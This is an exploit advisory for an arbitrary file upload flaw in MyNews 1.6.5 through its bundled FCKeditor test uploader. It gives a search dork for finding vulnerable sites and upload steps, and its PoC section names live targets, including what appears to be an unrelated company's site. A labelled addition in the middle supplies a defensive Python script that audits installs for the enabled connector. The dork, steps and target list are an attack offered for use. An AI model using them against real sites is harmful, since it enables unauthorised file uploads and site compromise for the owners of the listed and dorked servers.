MyNews Arbitrary File Upload Vuln

[o] MyNews Arbitrary File Upload Vulnerability

Software : MyNews 1.6.5
Vendor : http://www.planetluc.com/
Dork : "Powered by MyNews"
Author : NoGe


[o] Exploit

The bundled FCKeditor uploader is enabled in FCKeditor/editor/filemanager/upload/php/config.php:

// SECURITY: You must explicitelly enable this "uploader".

$Config['Enabled'] = true ;

http://localhost/[path]/FCKeditor/editor/filemanager/upload/test.html

In the "File Uploader" section, select "PHP".
Browse to the file you want to upload and click "Send it to the Server".
If the file uploads with no error, you will see the file path in "Uploaded File URL".

http://localhost/[path]/files/your_file.txt
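
A defensive check for the condition described above, as an added example that is not part of the original advisory: it walks a web root, finds FCKeditor upload connector configs, and reports whether $Config['Enabled'] is set to true and whether test.html is still deployed. The function names and the sample directory tree are constructed for illustration.

```python
import os
import re
import tempfile

# Matches an uncommented assignment such as: $Config['Enabled'] = true ;
ENABLED_RE = re.compile(
    r"""^\s*\$Config\[\s*['"]Enabled['"]\s*\]\s*=\s*(true|false)\s*;""",
    re.IGNORECASE | re.MULTILINE,
)
CONNECTOR = os.path.join("editor", "filemanager", "upload", "php", "config.php")


def connector_enabled(php_source):
    """Return the last uncommented $Config['Enabled'] value, or None if absent."""
    # Drop /* ... */ blocks so a commented-out assignment is not counted.
    source = re.sub(r"/\*.*?\*/", "", php_source, flags=re.DOTALL)
    values = ENABLED_RE.findall(source)
    return values[-1].lower() == "true" if values else None


def audit(webroot):
    """Return (config path, enabled, test page present) per connector found."""
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        path = os.path.join(dirpath, "config.php")
        if "config.php" not in files or not path.endswith(CONNECTOR):
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            enabled = connector_enabled(fh.read())
        # test.html lives in the parent directory, editor/filemanager/upload/
        test_page = os.path.join(os.path.dirname(dirpath), "test.html")
        findings.append((os.path.relpath(path, webroot), enabled, os.path.isfile(test_page)))
    return findings


def build_sample_tree(root):
    """Constructed sample install mirroring the paths in the advisory."""
    upload = os.path.join(root, "mynews", "FCKeditor", "editor", "filemanager", "upload")
    os.makedirs(os.path.join(upload, "php"))
    with open(os.path.join(upload, "php", "config.php"), "w") as fh:
        fh.write("<?php\n// $Config['Enabled'] = false ;\n$Config['Enabled'] = true ;\n")
    open(os.path.join(upload, "test.html"), "w").close()


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for finding in audit(tmp):
            print(finding)
```

Any result with enabled set to True should have the connector disabled in config.php, and test.html should be removed from deployed installs.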


[o] PoC

http://www.planetluc.com/en/demo/mynews/FCKeditor/editor/filemanager/upload/test.html
http://www.conveyorsystemsltd.co.uk/FCKeditor/editor/filemanager/upload/test.html